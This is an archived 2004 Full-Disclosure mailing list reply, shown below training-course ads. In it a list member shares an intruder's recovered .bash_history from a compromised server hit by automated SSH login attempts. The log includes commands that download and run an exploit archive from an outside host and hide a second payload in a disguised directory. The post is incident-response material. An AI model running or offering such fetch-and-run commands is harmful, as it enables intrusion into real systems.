Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-Disclosure] Re: Automated SSH login attempts?

from [andrewg] Network Security [Permanent Link]
Subject: Re: [Full-Disclosure] Re: Automated SSH login attempts?
Date: Fri, 30 Jul 2004 06:36:02 -0700 
Greetings list,

Accidentially sent only to Stefan, so redoing it.

On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:

Hmmm - I have also been getting those login attemps, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:



I got a similar experience from a game box I look after 
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @ 
irc.pulltheplug.com, #social or #vortex).

The .bash_history is as follows:

passwd
uname -a
cat /etc/issue
w
/sbin.ifconfig
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx
lynx www.sh3ll.info/milenium/xpl.tgz
ls
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
./prt
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
ncftp
ncftpget
lynx sh3ll.info/milenium/milenium
ls
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH'
inetd -e -o

It would appear that if they can't get a local root, they'll use the box for
IRCing from.

Hopefully this helps someone. I haven't looked too much into this, if wanted
I could grab the source ip addresses used for logging into guest, but thats
probably not overly useful.

Thanks,
Andrew Griffiths
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-Disclosure] Cool Web Search, Dave Horsfall
Next by Date:  Re: [Full-Disclosure] Cool Web Search, Gregh
Previous by Thread:  Re: [Full-Disclosure] Re: Automated SSH login attempts?, Dagur Valberg Johannsson
Next by Thread:  Re: [Full-Disclosure] Re: Automated SSH login attempts?, nicolas vigier
Indexes:  [Date] [Thread] [Top] [All Lists]